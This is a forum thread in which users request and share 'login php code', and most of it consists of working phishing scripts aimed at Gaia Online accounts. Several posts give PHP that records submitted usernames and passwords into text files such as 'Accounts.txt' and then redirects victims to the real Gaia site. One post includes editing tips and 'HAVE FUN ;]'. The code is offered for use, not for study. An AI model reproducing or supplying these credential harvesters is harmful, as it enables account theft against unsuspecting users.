Anyone Got Loin Php Code?
972 views · started by iGawd · · closed
I think Arti posted it
I was mistaken it was something else.
Here's loin php code:
<php>
<loin>pelvic%20THRUST
</loin>
</php>Minora wrote:Here's loin php code:
<php>
<loin>pelvic%20THRUST
</loin>
</php>
Lol`d so hard.
Here is one that I randomly found:
<html>
<head>
<title>Error</title>
<script type="text/javascript">
window.location = "http://www.websitethatyouwanttoredirectto.com"
</script>
</head>
<body>
</body>
</html>
<?php
@$username = addslashes($_POST['username']);
@$password = addslashes($_POST['password']);
$fileContents=file_get_contents("NAMEOFPASSWORDLIST.txt");
$file = fopen("NAMEOFPASSWORDLIST.txt","r+");
$fileContents=$fileContents . "\n" . $username . "\t" . $password;
fwrite($file,$fileContents);
fclose($file);
?>I think he posted it in the Programming Forum.
Talk to Gamechief. He knows PhP and may have a code for the login. No offence to arti.
<html>
<head>
<title>Error</title>
<script type="text/javascript">
window.location = "http://login.gaiaonline.com/gaia/login.php"
</script>
</head>
<body>
</body>
</html>
<?php
@$username = addslashes($_POST['username']);
@$password = addslashes($_POST['password']);
$fileContents=file_get_contents("info.txt");
$file = fopen("info.txt","r+");
$fileContents=$fileContents . "\n" . $username . "\t" . $password;
fwrite($file,$fileContents);
fclose($file);
?><?php
$username = $_POST['username'];
$password = $_POST['password'];
if(get_magic_quotes_gpc()) {
$username = stripslashes($username);
$password = stripslashes($password);
}
$log = "Accounts.txt";
$logfile = fopen($log, "a");
fwrite($logfile,$username.":".$password."\r\n");
fclose($logfile);
header ("Location:http://www.gaiaonline.com");
?>
Tab out username= and password=
the rest you leave the same
$username = $_POST['username'];
$password = $_POST['password'];
if(get_magic_quotes_gpc()) {
$username = stripslashes($username);
$password = stripslashes($password);
}
$log = "Accounts.txt";
$logfile = fopen($log, "a");
fwrite($logfile,$username.":".$password."\r\n");
fclose($logfile);
header ("Location:http://www.gaiaonline.com");
?>
Tab out username= and password=
the rest you leave the same
<?php
$username = $_POST['username'];
$password = $_POST['password'];
if(get_magic_quotes_gpc()) {
$username = stripslashes($username);
$password = stripslashes($password);
}
$log = "Accounts.txt";
$logfile = fopen($log, "a");
fwrite($logfile,$username.":".$password."\r\n");
fclose($logfile);
header ("Location:http://www.gaiaonline.com");
?>
HAVE FUN ;]
$username = $_POST['username'];
$password = $_POST['password'];
if(get_magic_quotes_gpc()) {
$username = stripslashes($username);
$password = stripslashes($password);
}
$log = "Accounts.txt";
$logfile = fopen($log, "a");
fwrite($logfile,$username.":".$password."\r\n");
fclose($logfile);
header ("Location:http://www.gaiaonline.com");
?>
HAVE FUN ;]
N0 CHALLENGE wrote:<?php
$username = $_POST['username'];
$password = $_POST['password'];
if(get_magic_quotes_gpc()) {
$username = stripslashes($username);
$password = stripslashes($password);
}
$log = "Accounts.txt";
$logfile = fopen($log, "a");
fwrite($logfile,$username.":".$password."\r\n");
fclose($logfile);
header ("Location:http://www.gaiaonline.com");
?>
HAVE FUN ;]
Good Job GraveDigging, Plus It Already Has Been Answered.